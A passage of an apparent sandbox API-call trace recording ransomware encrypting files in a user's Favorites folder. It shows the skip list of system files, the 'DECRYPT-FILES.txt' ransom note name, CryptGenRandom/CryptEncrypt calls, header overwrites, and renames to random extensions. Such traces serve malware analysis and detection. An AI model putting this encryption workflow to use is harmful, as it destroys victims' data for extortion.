lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" [0085.120] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.120] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0085.121] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=133) returned 1 [0085.121] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0085.121] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0085.121] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0085.121] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0085.121] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.123] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0085.123] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0085.123] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.124] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0085.124] CloseHandle (hObject=0x42c) returned 1 [0085.124] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.124] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0085.125] CloseHandle (hObject=0x0) returned 0 [0085.125] CloseHandle (hObject=0x428) returned 1 [0085.125] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.125] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.126] GetTickCount () returned 0x114dbde [0085.126] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.126] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0085.126] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0085.126] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.127] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0085.127] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url") returned 66 [0085.127] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.BhG1b") returned 72 [0085.127] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.BhG1b" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url.bhg1b"), dwFlags=0x0) returned 1 [0085.127] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.128] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.128] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.128] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Sports.url", cAlternateFileName="MSNSPO~1.URL")) returned 1 [0085.128] lstrcmpiW (lpString1="MSN Sports.url", lpString2="DECRYPT-FILES.txt") returned 1 [0085.128] lstrcmpiW (lpString1="MSN Sports.url", lpString2="autorun.inf") returned 1 [0085.128] lstrcmpiW (lpString1="MSN Sports.url", lpString2="boot.ini") returned 1 [0085.128] lstrcmpiW (lpString1="MSN Sports.url", lpString2="desktop.ini") returned 1 [0085.128] lstrcmpiW (lpString1="MSN Sports.url", lpString2="ntuser.dat") returned -1 [0085.128] lstrcmpiW (lpString1="MSN Sports.url", lpString2="iconcache.db") returned 1 [0085.128] lstrcmpiW (lpString1="MSN Sports.url", lpString2="bootsect.bak") returned 1 [0085.128] lstrcmpiW (lpString1="MSN Sports.url", lpString2="ntuser.dat.log") returned -1 [0085.128] lstrcmpiW (lpString1="MSN Sports.url", lpString2="thumbs.db") returned -1 [0085.128] lstrcmpiW (lpString1="MSN Sports.url", lpString2="Bootfont.bin") returned 1 [0085.128] lstrlenW (lpString="MSN Sports.url") returned 14 [0085.128] lstrcmpiW (lpString1="url", lpString2="lnk") returned 1 [0085.128] lstrcmpiW (lpString1="url", lpString2="exe") returned 1 [0085.129] lstrcmpiW (lpString1="url", lpString2="sys") returned 1 [0085.129] lstrcmpiW (lpString1="url", lpString2="dll") returned 1 [0085.129] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned 53 [0085.129] lstrlenW (lpString="MSN Sports.url") returned 14 [0085.129] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0085.129] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpString2="MSN Sports.url" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" [0085.129] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.129] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0085.130] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=133) returned 1 [0085.130] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0085.130] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0085.130] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0085.130] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0085.130] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.131] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0085.132] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0085.132] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.132] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0085.133] CloseHandle (hObject=0x42c) returned 1 [0085.133] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.133] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0085.133] CloseHandle (hObject=0x0) returned 0 [0085.134] CloseHandle (hObject=0x428) returned 1 [0085.134] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.134] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.134] GetTickCount () returned 0x114dbde [0085.134] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.134] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0085.134] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0085.135] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.135] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0085.135] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url") returned 67 [0085.135] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.BhG1b") returned 73 [0085.135] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.BhG1b" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url.bhg1b"), dwFlags=0x0) returned 1 [0085.136] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.136] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.136] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.136] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN.url", cAlternateFileName="")) returned 1 [0085.137] lstrcmpiW (lpString1="MSN.url", lpString2="DECRYPT-FILES.txt") returned 1 [0085.137] lstrcmpiW (lpString1="MSN.url", lpString2="autorun.inf") returned 1 [0085.137] lstrcmpiW (lpString1="MSN.url", lpString2="boot.ini") returned 1 [0085.137] lstrcmpiW (lpString1="MSN.url", lpString2="desktop.ini") returned 1 [0085.137] lstrcmpiW (lpString1="MSN.url", lpString2="ntuser.dat") returned -1 [0085.137] lstrcmpiW (lpString1="MSN.url", lpString2="iconcache.db") returned 1 [0085.137] lstrcmpiW (lpString1="MSN.url", lpString2="bootsect.bak") returned 1 [0085.137] lstrcmpiW (lpString1="MSN.url", lpString2="ntuser.dat.log") returned -1 [0085.137] lstrcmpiW (lpString1="MSN.url", lpString2="thumbs.db") returned -1 [0085.137] lstrcmpiW (lpString1="MSN.url", lpString2="Bootfont.bin") returned 1 [0085.137] lstrlenW (lpString="MSN.url") returned 7 [0085.137] lstrcmpiW (lpString1="url", lpString2="lnk") returned 1 [0085.137] lstrcmpiW (lpString1="url", lpString2="exe") returned 1 [0085.137] lstrcmpiW (lpString1="url", lpString2="sys") returned 1 [0085.137] lstrcmpiW (lpString1="url", lpString2="dll") returned 1 [0085.137] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned 53 [0085.137] lstrlenW (lpString="MSN.url") returned 7 [0085.137] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0085.137] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpString2="MSN.url" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" [0085.137] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.137] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0085.138] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=133) returned 1 [0085.138] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0085.138] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0085.138] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0085.138] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0085.138] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.139] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0085.139] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0085.140] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.140] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0085.140] CloseHandle (hObject=0x42c) returned 1 [0085.141] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.141] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0085.142] CloseHandle (hObject=0x0) returned 0 [0085.142] CloseHandle (hObject=0x428) returned 1 [0085.142] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.142] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.142] GetTickCount () returned 0x114dbee [0085.142] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.143] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0085.143] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0085.143] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.143] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0085.143] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url") returned 60 [0085.143] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.0L2uJ") returned 66 [0085.144] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.0L2uJ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url.0l2uj"), dwFlags=0x0) returned 1 [0085.144] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.144] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.144] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.145] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 1 [0085.145] lstrcmpiW (lpString1="MSNBC News.url", lpString2="DECRYPT-FILES.txt") returned 1 [0085.145] lstrcmpiW (lpString1="MSNBC News.url", lpString2="autorun.inf") returned 1 [0085.145] lstrcmpiW (lpString1="MSNBC News.url", lpString2="boot.ini") returned 1 [0085.145] lstrcmpiW (lpString1="MSNBC News.url", lpString2="desktop.ini") returned 1 [0085.145] lstrcmpiW (lpString1="MSNBC News.url", lpString2="ntuser.dat") returned -1 [0085.145] lstrcmpiW (lpString1="MSNBC News.url", lpString2="iconcache.db") returned 1 [0085.145] lstrcmpiW (lpString1="MSNBC News.url", lpString2="bootsect.bak") returned 1 [0085.145] lstrcmpiW (lpString1="MSNBC News.url", lpString2="ntuser.dat.log") returned -1 [0085.145] lstrcmpiW (lpString1="MSNBC News.url", lpString2="thumbs.db") returned -1 [0085.145] lstrcmpiW (lpString1="MSNBC News.url", lpString2="Bootfont.bin") returned 1 [0085.145] lstrlenW (lpString="MSNBC News.url") returned 14 [0085.145] lstrcmpiW (lpString1="url", lpString2="lnk") returned 1 [0085.145] lstrcmpiW (lpString1="url", lpString2="exe") returned 1 [0085.145] lstrcmpiW (lpString1="url", lpString2="sys") returned 1 [0085.145] lstrcmpiW (lpString1="url", lpString2="dll") returned 1 [0085.145] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned 53 [0085.145] lstrlenW (lpString="MSNBC News.url") returned 14 [0085.145] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0085.145] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpString2="MSNBC News.url" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" [0085.145] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.145] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0085.146] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=133) returned 1 [0085.147] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0085.147] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0085.147] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0085.147] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0085.147] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.148] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0085.148] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0085.149] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.149] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0085.149] CloseHandle (hObject=0x42c) returned 1 [0085.149] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.149] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0085.150] CloseHandle (hObject=0x0) returned 0 [0085.150] CloseHandle (hObject=0x428) returned 1 [0085.150] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.151] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.151] GetTickCount () returned 0x114dbee [0085.151] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.151] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0085.151] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0085.151] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.152] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0085.152] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url") returned 67 [0085.152] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.0L2uJ") returned 73 [0085.152] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.0L2uJ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url.0l2uj"), dwFlags=0x0) returned 1 [0085.152] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.153] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.153] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.153] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 0 [0085.153] FindClose (in: hFindFile=0x5f8c98 | out: hFindFile=0x5f8c98) returned 1 [0085.153] CloseHandle (hObject=0x410) returned 1 [0085.153] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | 